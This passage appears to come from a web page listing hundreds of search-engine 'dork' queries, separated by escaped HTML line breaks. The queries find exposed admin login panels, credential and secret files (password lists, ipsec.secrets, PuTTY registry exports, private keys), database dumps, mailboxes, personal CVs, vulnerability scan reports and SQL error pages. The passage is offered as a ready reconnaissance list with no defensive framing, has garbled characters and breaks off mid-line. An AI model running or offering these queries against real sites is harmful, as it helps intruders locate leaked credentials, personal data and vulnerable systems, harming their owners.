/&gt;intitle:"Athens Authentication Point"&lt;br /&gt;intitle:"b2evo &gt; Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net&lt;br /&gt;intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co&lt;br /&gt;intitle:"ColdFusion Administrator Login"&lt;br /&gt;intitle:"communigate pro * *" intitle:"entrance"&lt;br /&gt;intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo&lt;br /&gt;intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo&lt;br /&gt;intitle:"Dell Remote Access Controller"&lt;br /&gt;intitle:"Docutek ERes - Admin Login" -edu&lt;br /&gt;intitle:"Employee Intranet Login"&lt;br /&gt;intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."&lt;br /&gt;intitle:"ePowerSwitch Login"&lt;br /&gt;intitle:"eXist Database Administration" -demo&lt;br /&gt;intitle:"EXTRANET * - Identification"&lt;br /&gt;intitle:"EXTRANET login" -.edu -.mil -.gov&lt;br /&gt;intitle:"EZPartner" -netpond&lt;br /&gt;intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists&lt;br /&gt;intitle:"i-secure v1.1" -edu&lt;br /&gt;intitle:"Icecast Administration Admin Page"&lt;br /&gt;intitle:"iDevAffiliate - admin" -demo&lt;br /&gt;intitle:"ISPMan : Unauthorized Access prohibited"&lt;br /&gt;intitle:"ITS System Information" "Please log on to the SAP System"&lt;br /&gt;intitle:"Kurant Corporation StoreSense" filetype:bok&lt;br /&gt;intitle:"ListMail Login" admin -demo&lt;br /&gt;intitle:"Login -&lt;br /&gt;Easy File Sharing Web Server"&lt;br /&gt;intitle:"Login Forum&lt;br /&gt;AnyBoard" intitle:"If you are a new user:" intext:"Forum&lt;br /&gt;AnyBoard" inurl:gochat -edu&lt;br /&gt;intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman&lt;br /&gt;intitle:"Login to Cacti"&lt;br /&gt;intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=&lt;br /&gt;intitle:"MailMan Login"&lt;br /&gt;intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi&lt;br /&gt;intitle:"Merak Mail Server Web Administration" -ihackstuff.com&lt;br /&gt;intitle:"microsoft certificate services" inurl:certsrv&lt;br /&gt;intitle:"MikroTik RouterOS Managing Webpage"&lt;br /&gt;intitle:"MX Control Console" "If you can't remember"&lt;br /&gt;intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf&lt;br /&gt;intitle:"Novell Web Services" intext:"Select a service and a language."&lt;br /&gt;intitle:"oMail-admin Administration - Login" -inurl:omnis.ch&lt;br /&gt;intitle:"OnLine Recruitment Program - Login"&lt;br /&gt;intitle:"Philex 0.2*" -s?ri?t -site:freelists.org&lt;br /&gt;intitle:"PHP Advanced Transfer" inurl:"login.php"&lt;br /&gt;intitle:"php icalendar administration" -site:sourceforge.net&lt;br /&gt;intitle:"php icalendar administration" -site:sourceforge.net&lt;br /&gt;intitle:"phpPgAdmin - Login" Language&lt;br /&gt;intitle:"PHProjekt - login" login password&lt;br /&gt;intitle:"please login" "your password is *"&lt;br /&gt;intitle:"Remote Desktop Web Connection" inurl:tsweb&lt;br /&gt;intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"&lt;br /&gt;intitle:"SHOUTcast Administrator" inurl:admin.cgi&lt;br /&gt;intitle:"site administration: please log in" "site designed by emarketsouth"&lt;br /&gt;intitle:"Supero Doctor III" -inurl:supermicro&lt;br /&gt;intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"&lt;br /&gt;intitle:"teamspeak server-administration&lt;br /&gt;intitle:"Tomcat Server Administration"&lt;br /&gt;intitle:"TOPdesk ApplicationServer"&lt;br /&gt;intitle:"TUTOS Login"&lt;br /&gt;intitle:"TWIG Login"&lt;br /&gt;intitle:"vhost" intext:"vHost . 2000-2004"&lt;br /&gt;intitle:"Virtual Server Administration System"&lt;br /&gt;intitle:"VisNetic WebMail" inurl:"/mail/"&lt;br /&gt;intitle:"VitalQIP IP Management System"&lt;br /&gt;intitle:"VMware Management Interface:" inurl:"vmware/en/"&lt;br /&gt;intitle:"VNC viewer for Java"&lt;br /&gt;intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org&lt;br /&gt;intitle:"WebLogic Server" intitle:"Console Login" inurl:console&lt;br /&gt;intitle:"Welcome Site/User Administrator" "Please select the language" -demos&lt;br /&gt;intitle:"Welcome to Mailtraq WebMail"&lt;br /&gt;intitle:"welcome to netware *" -site:novell.com&lt;br /&gt;intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."&lt;br /&gt;intitle:"xams 0.0.0..15 - Login"&lt;br /&gt;intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin&lt;br /&gt;intitle:"XMail Web Administration Interface" intext:Login intext:password&lt;br /&gt;intitle:"Zope Help System" inurl:HelpSys&lt;br /&gt;intitle:"ZyXEL Prestige Router" "Enter password"&lt;br /&gt;intitle:"inc. vpn 3000 concentrator"&lt;br /&gt;intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com&lt;br /&gt;intitle:asterisk.management.portal web-access&lt;br /&gt;intitle:endymion.sak?.mail.login.page | inurl:sake.servlet&lt;br /&gt;intitle:Group-Office "Enter your username and password to login"&lt;br /&gt;intitle:ilohamail "&lt;br /&gt;IlohaMail"&lt;br /&gt;intitle:ilohamail intext:"Version 0.8.10" "&lt;br /&gt;IlohaMail"&lt;br /&gt;intitle:IMP inurl:imp/index.php3&lt;br /&gt;intitle:Login * Webmailer&lt;br /&gt;intitle:Login intext:"RT is ? Copyright"&lt;br /&gt;intitle:Node.List Win32.Version.3.11&lt;br /&gt;intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"&lt;br /&gt;intitle:open-xchange inurl:login.pl&lt;br /&gt;intitle:Ovislink inurl:private/login&lt;br /&gt;intitle:phpnews.login&lt;br /&gt;intitle:plesk inurl:login.php3&lt;br /&gt;inurl:"/admin/configuration. php?" Mystore&lt;br /&gt;inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"&lt;br /&gt;inurl:"1220/parse_xml.cgi?"&lt;br /&gt;inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)&lt;br /&gt;inurl:":10000" intext:webmin&lt;br /&gt;inurl:"Activex/default.htm" "Demo"&lt;br /&gt;inurl:"calendar.asp?action=login"&lt;br /&gt;inurl:"default/login.php" intitle:"kerio"&lt;br /&gt;inurl:"gs/adminlogin.aspx"&lt;br /&gt;inurl:"php121login.php"&lt;br /&gt;inurl:"suse/login.pl"&lt;br /&gt;inurl:"typo3/index.php?u=" -demo&lt;br /&gt;inurl:"usysinfo?login=true"&lt;br /&gt;inurl:"utilities/TreeView.asp"&lt;br /&gt;inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;nurl:/admin/login.asp&lt;br /&gt;inurl:/cgi-bin/sqwebmail?noframes=1&lt;br /&gt;inurl:/Citrix/Nfuse17/&lt;br /&gt;inurl:/dana-na/auth/welcome.html&lt;br /&gt;inurl:/eprise/&lt;br /&gt;inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net&lt;br /&gt;inurl:/modcp/ intext:Moderator+vBulletin&lt;br /&gt;inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"&lt;br /&gt;inurl:/webedit.* intext:WebEdit Professional -html&lt;br /&gt;inurl:1810 "Oracle Enterprise Manager"&lt;br /&gt;inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com&lt;br /&gt;inurl::2082/frontend -demo&lt;br /&gt;inurl:administrator "welcome to mambo"&lt;br /&gt;inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0&lt;br /&gt;inurl:cgi-bin/ultimatebb.cgi?ubb=login&lt;br /&gt;inurl:Citrix/MetaFrame/default/default.aspx&lt;br /&gt;inurl:confixx inurl:login|anmeldung&lt;br /&gt;inurl:coranto.cgi intitle:Login (Authorized Users Only)&lt;br /&gt;inurl:csCreatePro.cgi&lt;br /&gt;inurl:default.asp intitle:"WebCommander"&lt;br /&gt;inurl:exchweb/bin/auth/owalogon.asp&lt;br /&gt;inurl:gnatsweb.pl&lt;br /&gt;inurl:ids5web&lt;br /&gt;inurl:irc filetype:cgi cgi:irc&lt;br /&gt;inurl:login filetype:swf swf&lt;br /&gt;inurl:login.asp&lt;br /&gt;inurl:login.cfm&lt;br /&gt;inurl:login.php "SquirrelMail version"&lt;br /&gt;inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"&lt;br /&gt;inurl:mewebmail&lt;br /&gt;inurl:names.nsf?opendatabase&lt;br /&gt;inurl:ocw_login_username&lt;br /&gt;inurl:orasso.wwsso_app_admin.ls_login&lt;br /&gt;inurl:postfixadmin intitle:"postfix admin" ext:php&lt;br /&gt;inurl:search/admin.php&lt;br /&gt;inurl:textpattern/index.php&lt;br /&gt;inurl:WCP_USER&lt;br /&gt;inurl:webmail./index.pl "Interface"&lt;br /&gt;inurl:webvpn.html "login" "Please enter your"&lt;br /&gt;Login ("&lt;br /&gt;Jetbox One CMS â?¢" | "&lt;br /&gt;Jetstream ? *")&lt;br /&gt;Novell NetWare intext:"netware management portal version"&lt;br /&gt;Outlook Web Access (a better way)&lt;br /&gt;PhotoPost PHP Upload&lt;br /&gt;PHPhotoalbum Statistics&lt;br /&gt;PHPhotoalbum Upload&lt;br /&gt;phpWebMail&lt;br /&gt;Please enter a valid password! inurl:polladmin&lt;br /&gt;&lt;br /&gt;INDEXU&lt;br /&gt;Ultima Online loginservers&lt;br /&gt;W-Nailer Upload Area&lt;br /&gt;intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu&lt;br /&gt;"#mysql dump" filetype:sql&lt;br /&gt;"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3&lt;br /&gt;"allow_call_time_pass_reference" "PATH_INFO"&lt;br /&gt;"Certificate Practice Statement" inurl:(PDF | DOC)&lt;br /&gt;"Generated by phpSystem"&lt;br /&gt;"generated by wwwstat"&lt;br /&gt;"Host Vulnerability Summary Report"&lt;br /&gt;"HTTP_FROM=googlebot" googlebot.com "Server_Software="&lt;br /&gt;"Index of" / "chat/logs"&lt;br /&gt;"Installed Objects Scanner" inurl:default.asp&lt;br /&gt;"MacHTTP" filetype:log inurl:machttp.log&lt;br /&gt;"Mecury Version" "Infastructure Group"&lt;br /&gt;"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log&lt;br /&gt;"Most Submitted Forms and s?ri?ts" "this section"&lt;br /&gt;"Network Vulnerability Assessment Report"&lt;br /&gt;"not for distribution" confidential&lt;br /&gt;"not for public release" -.edu -.gov -.mil&lt;br /&gt;"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"&lt;br /&gt;"phpMyAdmin" "running on" inurl:"main.php"&lt;br /&gt;"produced by getstats"&lt;br /&gt;"Request Details" "Control Tree" "Server Variables"&lt;br /&gt;"robots.txt" "Disallow:" filetype:txt&lt;br /&gt;"Running in Child mode"&lt;br /&gt;"sets mode: +p"&lt;br /&gt;"sets mode: +s"&lt;br /&gt;"Thank you for your order" +receipt&lt;br /&gt;"This is a Shareaza Node"&lt;br /&gt;"This report was generated by WebLog"&lt;br /&gt;( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject&lt;br /&gt;(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")&lt;br /&gt;(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob&lt;br /&gt;(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt&lt;br /&gt;+":8080" +":3128" +":80" filetype:txt&lt;br /&gt;+"HSTSNR" -"netop.com"&lt;br /&gt;-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp&lt;br /&gt;94FBR "ADOBE PHOTOSHOP"&lt;br /&gt;AIM buddy lists&lt;br /&gt;allinurl:/examples/jsp/snp/snoop.jsp&lt;br /&gt;allinurl:cdkey.txt&lt;br /&gt;allinurl:servlet/SnoopServlet&lt;br /&gt;cgiirc.conf&lt;br /&gt;cgiirc.conf&lt;br /&gt;contacts ext:wml&lt;br /&gt;data filetype:mdb -site:gov -site:mil&lt;br /&gt;exported email addresses&lt;br /&gt;ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential&lt;br /&gt;ext:asp inurl:pathto.asp&lt;br /&gt;ext:ccm ccm -catacomb&lt;br /&gt;ext:CDX CDX&lt;br /&gt;ext:cgi inurl:editcgi.cgi inurl:file=&lt;br /&gt;ext:conf inurl:rsyncd.conf -cvs -man&lt;br /&gt;ext:conf NoCatAuth -cvs&lt;br /&gt;ext:dat bpk.dat&lt;br /&gt;ext:gho gho&lt;br /&gt;ext:ics ics&lt;br /&gt;ext:ini intext:env.ini&lt;br /&gt;ext:jbf jbf&lt;br /&gt;ext:ldif ldif&lt;br /&gt;ext:log "Software: Microsoft Internet Information Services *.*"&lt;br /&gt;ext:mdb inurl:*.mdb inurl:fpdb shop.mdb&lt;br /&gt;ext:nsf nsf -gov -mil&lt;br /&gt;ext:plist filetype:plist inurl:bookmarks.plist&lt;br /&gt;ext:pqi pqi -database&lt;br /&gt;ext:reg "username=*" putty&lt;br /&gt;ext:txt "Final encryption key"&lt;br /&gt;ext:txt inurl:dxdiag&lt;br /&gt;ext:vmdk vmdk&lt;br /&gt;ext:vmx vmx&lt;br /&gt;filetype:asp DBQ=" * Server.MapPath("*.mdb")&lt;br /&gt;filetype:bkf bkf&lt;br /&gt;filetype:blt "buddylist"&lt;br /&gt;filetype:blt blt +intext:screenname&lt;br /&gt;filetype:cfg auto_inst.cfg&lt;br /&gt;filetype:cnf inurl:_vti_pvt access.cnf&lt;br /&gt;filetype:conf inurl:firewall -intitle:cvs&lt;br /&gt;filetype:config web.config -CVS&lt;br /&gt;filetype:ctt Contact&lt;br /&gt;filetype:ctt ctt messenger&lt;br /&gt;filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"&lt;br /&gt;filetype:fp3 fp3&lt;br /&gt;filetype:fp5 fp5 -site:gov -site:mil -"cvs log"&lt;br /&gt;filetype:fp7 fp7&lt;br /&gt;filetype:inf inurl:capolicy.inf&lt;br /&gt;filetype:lic lic intext:key&lt;br /&gt;filetype:log access.log -CVS&lt;br /&gt;filetype:log cron.log&lt;br /&gt;filetype:mbx mbx intext:Subject&lt;br /&gt;filetype:myd myd -CVS&lt;br /&gt;filetype:ns1 ns1&lt;br /&gt;filetype:ora ora&lt;br /&gt;filetype:ora tnsnames&lt;br /&gt;filetype:pdb pdb backup (Pilot | Pluckerdb)&lt;br /&gt;filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net&lt;br /&gt;filetype:pot inurl:john.pot&lt;br /&gt;filetype:PS ps&lt;br /&gt;filetype:pst inurl:"outlook.pst"&lt;br /&gt;filetype:pst pst -from -to -date&lt;br /&gt;filetype:qbb qbb&lt;br /&gt;filetype:QBW qbw&lt;br /&gt;filetype:rdp rdp&lt;br /&gt;filetype:reg "Terminal Server Client"&lt;br /&gt;filetype:vcs vcs&lt;br /&gt;filetype:wab wab&lt;br /&gt;filetype:xls -site:gov inurl:contact&lt;br /&gt;filetype:xls inurl:"email.xls"&lt;br /&gt;Financial spreadsheets: finance.xls&lt;br /&gt;Financial spreadsheets: finances.xls&lt;br /&gt;Ganglia Cluster Reports&lt;br /&gt;haccess.ctl (one way)&lt;br /&gt;haccess.ctl (VERY reliable)&lt;br /&gt;ICQ chat logs, please...&lt;br /&gt;intext:"Session Start * * * *:*:* *" filetype:log&lt;br /&gt;intext:"Tobias Oetiker" "traffic analysis"&lt;br /&gt;intext:(password | passcode) intext:(username | userid | user) filetype:csv&lt;br /&gt;intext:gmail invite intext:http://gmail.google.com/gmail/a&lt;br /&gt;intext:SQLiteManager inurl:main.php&lt;br /&gt;intext:ViewCVS inurl:Settings.php&lt;br /&gt;intitle:"admin panel" +"&lt;br /&gt;RedKernel"&lt;br /&gt;intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)&lt;br /&gt;intitle:"AppServ Open Project" -site:www.appservnetwork.com&lt;br /&gt;intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"&lt;br /&gt;intitle:"Big Sister" +"OK Attention Trouble"&lt;br /&gt;intitle:"curriculum vitae" filetype:doc&lt;br /&gt;intitle:"edna:streaming mp3 server" -forums&lt;br /&gt;intitle:"FTP root at"&lt;br /&gt;intitle:"index of" +myd size&lt;br /&gt;intitle:"Index Of" -inurl:maillog maillog size&lt;br /&gt;intitle:"Index Of" cookies.txt size&lt;br /&gt;intitle:"index of" mysql.conf OR mysql_config&lt;br /&gt;intitle:"Index of" upload size parent directory&lt;br /&gt;intitle:"index.of *" admin news.asp configview.asp&lt;br /&gt;intitle:"index.of" .diz .nfo last modified&lt;br /&gt;intitle:"Joomla - Web Installer"&lt;br /&gt;intitle:"LOGREP - Log file reporting system" -site:itefix.no&lt;br /&gt;intitle:"Multimon UPS status page"&lt;br /&gt;intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )&lt;br /&gt;intitle:"PhpMyExplorer" inurl:"index.php" -cvs&lt;br /&gt;intitle:"statistics of" "advanced web statistics"&lt;br /&gt;intitle:"System Statistics" +"System and Network Information Center"&lt;br /&gt;intitle:"urchin (5|3|admin)" ext:cgi&lt;br /&gt;intitle:"Usage Statistics for" "Generated by Webalizer"&lt;br /&gt;intitle:"wbem" compaq login "Compaq Information Technologies Group"&lt;br /&gt;intitle:"Web Server Statistics for ****"&lt;br /&gt;intitle:"web server status" SSH Telnet&lt;br /&gt;intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"&lt;br /&gt;intitle:"welcome.to.squeezebox"&lt;br /&gt;intitle:admin intitle:login&lt;br /&gt;intitle:Bookmarks inurl:bookmarks.html "Bookmarks&lt;br /&gt;intitle:index.of "Apache" "server at"&lt;br /&gt;intitle:index.of cleanup.log&lt;br /&gt;intitle:index.of dead.letter&lt;br /&gt;intitle:index.of inbox&lt;br /&gt;intitle:index.of inbox dbx&lt;br /&gt;intitle:index.of ws_ftp.ini&lt;br /&gt;intitle:intranet inurl:intranet +intext:"phone"&lt;br /&gt;inurl:"/axs/ax-admin.pl" -s?ri?t&lt;br /&gt;inurl:"/cricket/grapher.cgi"&lt;br /&gt;inurl:"bookmark.htm"&lt;br /&gt;inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM&lt;br /&gt;inurl:"newsletter/admin/"&lt;br /&gt;inurl:"newsletter/admin/" intitle:"newsletter admin"&lt;br /&gt;inurl:"putty.reg"&lt;br /&gt;inurl:"smb.conf" intext:"workgroup" filetype:conf conf&lt;br /&gt;inurl:*db filetype:mdb&lt;br /&gt;inurl:/cgi-bin/pass.txt&lt;br /&gt;inurl:/_layouts/settings&lt;br /&gt;inurl:admin filetype:xls&lt;br /&gt;inurl:admin intitle:login&lt;br /&gt;inurl:backup filetype:mdb&lt;br /&gt;inurl:build.err&lt;br /&gt;inurl:cgi-bin/printenv&lt;br /&gt;inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"&lt;br /&gt;inurl:changepassword.asp&lt;br /&gt;inurl:ds.py&lt;br /&gt;inurl:email filetype:mdb&lt;br /&gt;inurl:fcgi-bin/echo&lt;br /&gt;inurl:forum filetype:mdb&lt;br /&gt;inurl:forward filetype:forward -cvs&lt;br /&gt;inurl:getmsg.html intitle:hotmail&lt;br /&gt;inurl:log.nsf -gov&lt;br /&gt;inurl:main.php phpMyAdmin&lt;br /&gt;inurl:main.php Welcome to phpMyAdmin&lt;br /&gt;inurl:netscape.hst&lt;br /&gt;inurl:netscape.hst&lt;br /&gt;inurl:netscape.ini&lt;br /&gt;inurl:odbc.ini ext:ini -cvs&lt;br /&gt;inurl:perl/printenv&lt;br /&gt;inurl:php.ini filetype:ini&lt;br /&gt;inurl:preferences.ini "[emule]"&lt;br /&gt;inurl:profiles filetype:mdb&lt;br /&gt;inurl:report "EVEREST Home Edition "&lt;br /&gt;inurl:server-info "Apache Server Information"&lt;br /&gt;inurl:server-status "apache"&lt;br /&gt;inurl:snitz_forums_2000.mdb&lt;br /&gt;inurl:ssl.conf filetype:conf&lt;br /&gt;inurl:tdbin&lt;br /&gt;inurl:vbstats.php "page generated"&lt;br /&gt;inurl:wp-mail.php + "There doesn't seem to be any new mail."&lt;br /&gt;inurl:XcCDONTS.asp&lt;br /&gt;ipsec.conf&lt;br /&gt;ipsec.secrets&lt;br /&gt;ipsec.secrets&lt;br /&gt;Lotus Domino address books&lt;br /&gt;mail filetype:csv -site:gov intext:name&lt;br /&gt;Microsoft Money Data Files&lt;br /&gt;mt-db-pass.cgi files&lt;br /&gt;MySQL tabledata dumps&lt;br /&gt;mystuff.xml - Trillian data files&lt;br /&gt;OWA Public Folders (direct view)&lt;br /&gt;Peoples MSN contact lists&lt;br /&gt;php-addressbook "This is the addressbook for *" -warning&lt;br /&gt;phpinfo()&lt;br /&gt;phpMyAdmin dumps&lt;br /&gt;phpMyAdmin dumps&lt;br /&gt;private key files (.csr)&lt;br /&gt;private key files (.key)&lt;br /&gt;Quicken data files&lt;br /&gt;rdbqds -site:.edu -site:.mil -site:.gov&lt;br /&gt;robots.txt&lt;br /&gt;site:edu admin grades&lt;br /&gt;site:www.mailinator.com inurl:ShowMail.do&lt;br /&gt;SQL data dumps&lt;br /&gt;Squid cache server reports&lt;br /&gt;Unreal IRCd&lt;br /&gt;WebLog Referrers&lt;br /&gt;Welcome to ntop!&lt;br /&gt;Fichier contenant des informations sur le r?seau :&lt;br /&gt;filetype:log intext:"ConnectionManager2"&lt;br /&gt;"apricot - admin" 00h&lt;br /&gt;"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"&lt;br /&gt;"Network Host Assessment Report" "Internet Scanner"&lt;br /&gt;"Output produced by SysWatch *"&lt;br /&gt;"Phorum Admin" "Database Connection" inurl:forum inurl:admin&lt;br /&gt;phpOpenTracker" Statistics&lt;br /&gt;"powered | performed by Beyond Security's Automated Scanning" -kazaa -example&lt;br /&gt;"Shadow Security Scanner performed a vulnerability assessment"&lt;br /&gt;"SnortSnarf alert page"&lt;br /&gt;"The following report contains confidential information" vulnerability -search&lt;br /&gt;"The statistics were last upd?t?d" "Daily"-microsoft.com&lt;br /&gt;"this proxy is working fine!" "enter *" "URL***" * visit&lt;br /&gt;"This report lists" "identified by Internet Scanner"&lt;br /&gt;"Traffic Analysis for" "RMON Port * on unit *"&lt;br /&gt;"Version Info" "Boot Version" "Internet Settings"&lt;br /&gt;((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))&lt;br /&gt;Analysis Console for Incident Databases&lt;br /&gt;ext:cfg radius.cfg&lt;br /&gt;ext:cgi intext:"nrg-" " This web page was created on "&lt;br /&gt;filetype:pdf "Assessment Report" nessus&lt;br /&gt;filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"&lt;br /&gt;filetype:php inurl:nqt intext:"Network Query Tool"&lt;br /&gt;filetype:vsd vsd network -samples -examples&lt;br /&gt;intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm&lt;br /&gt;intitle:"ADSL Configuration page"&lt;br /&gt;intitle:"Azureus : Java BitTorrent Client Tracker"&lt;br /&gt;intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."&lt;br /&gt;intitle:"BNBT Tracker Info"&lt;br /&gt;intitle:"Microsoft Site Server Analysis"&lt;br /&gt;intitle:"Nessus Scan Report" "This file was generated by Nessus"&lt;br /&gt;intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"&lt;br /&gt;intitle:"Retina Report" "CONFIDENTIAL INFORMATION"&lt;br /&gt;intitle:"start.managing.the.device" remote pbx acc&lt;br /&gt;intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."&lt;br /&gt;intitle:"twiki" inurl:"TWikiUsers"&lt;br /&gt;inurl:"/catalog.nsf" intitle:catalog&lt;br /&gt;inurl:"install/install.php"&lt;br /&gt;inurl:"map.asp?" intitle:"WhatsUp Gold"&lt;br /&gt;inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"&lt;br /&gt;inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo&lt;br /&gt;inurl:/adm-cfgedit.php&lt;br /&gt;inurl:/cgi-bin/finger? "In real life"&lt;br /&gt;inurl:/cgi-bin/finger? Enter (account|host|user|username)&lt;br /&gt;inurl:/counter/index.php intitle:"+PHPCounter 7.*"&lt;br /&gt;inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"&lt;br /&gt;inurl:login.jsp.bak&lt;br /&gt;inurl:ovcgi/jovw&lt;br /&gt;inurl:phpSysInfo/ "created by phpsysinfo"&lt;br /&gt;inurl:portscan.php "from Port"|"Port Range"&lt;br /&gt;inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl&lt;br /&gt;inurl:statrep.nsf -gov&lt;br /&gt;inurl:status.cgi?host=all&lt;br /&gt;inurl:testcgi xitami&lt;br /&gt;inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin&lt;br /&gt;inurl:webutil.pl&lt;br /&gt;Looking Glass&lt;br /&gt;site:netcraft.com intitle:That.Site.Running Apache&lt;br /&gt;"A syntax error has occurred" filetype:ihtml&lt;br /&gt;"access denied for user" "using password"&lt;br /&gt;"An illegal character has been found in the statement" -"previous message"&lt;br /&gt;"ASP.NET_SessionId" "data source="&lt;br /&gt;"Can't connect to local" intitle:warning&lt;br /&gt;"Chatologica MetaSearch" "stack tracking"&lt;br /&gt;"detected an internal error [IBM][CLI Driver][DB2/6000]"&lt;br /&gt;"error found handling the request" cocoon filetype:xml&lt;br /&gt;"Fatal error: Call to undefined function" -reply -the -next&lt;br /&gt;"Incorrect syntax near"&lt;br /&gt;"Incorrect syntax near"&lt;br /&gt;"Internal Server Error" "server at"&lt;br /&gt;"Invision Power Board Database Error"&lt;br /&gt;"ORA-00933: SQL command not properly ended"&lt;br /&gt;"ORA-12541: TNS:no listener" intitle:"error occurred"&lt;br /&gt;"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php&lt;br /&gt;"PostgreSQL query failed: ERROR: parser: parse error"&lt;br /&gt;"Supplied argument is not a valid MySQL result resource"&lt;br /&gt;"Syntax error in query expression " -the&lt;br /&gt;"The s?ri?t whose uid is " "is not allowed to access"&lt;br /&gt;"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."&lt;br /&gt;"Unable to jump to row" "on MySQL result index" "on line"&lt;br /&gt;"Unclosed quotation mark before the character string"&lt;br /&gt;"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum&lt;br /&gt;"Warning: Cannot modify header information - headers already sent"&lt;br /&gt;"Warning: Division by zero in" "on line" -forum&lt;br /&gt;&lt;br /&gt;"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum&lt;br /&gt;"Warning: mysql_query()" "invalid query"&lt;br /&gt;"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"&lt;br /&gt;"Warning: Supplied argument is not a valid File-Handle resource in"&lt;br /&gt;"Warning:" "failed to open stream: HTTP request failed" "on line"&lt;br /&gt;"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"&lt;br /&gt;"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"&lt;br /&gt;An unexpected token "END-OF-STATEMENT" was found&lt;br /&gt;Coldfusion Error Pages&lt;br /&gt;filetype:asp + "[ODBC SQL"&lt;br /&gt;filetype:asp "Custom Error Message" Category Source&lt;br /&gt;filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"&lt;br /&gt;filetype:php inurl:"logging.php" "Discuz" error&lt;br /&gt;ht://Dig htsearch error&lt;br /&gt;IIS 4.0 error messages&lt;br /&gt;IIS web server error messages&lt;br /&gt;Internal Server Error&lt;br /&gt;intext:"Error Message : Error loading required libraries."&lt;br /&gt;intext:"Warning: Failed opening" "on line" "include_path"&lt;br /&gt;intitle:"Apache Tomcat" "Error Report"&lt;br /&gt;intitle:"Default PLESK Page"&lt;br /&gt;intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm&lt;br /&gt;intitle:"Error Occurred" "The error occurred in" filetype:cfm&lt;br /&gt;intitle:"Error using Hypernews" "Server Software"&lt;br /&gt;intitle:"Execution of this s?ri?t not permitted"&lt;br /&gt;intitle:"Under construction" "does not currently have"&lt;br /&gt;intitle:Configuration.File inurl:softcart.exe&lt;br /&gt;MYSQL error message: supplied argument....&lt;br /&gt;mysql error with query&lt;br /&gt;Netscape Application Server Error page&lt;br /&gt;ORA-00921: unexpected end of SQL command&lt;br /&gt;ORA-00921: unexpected end of 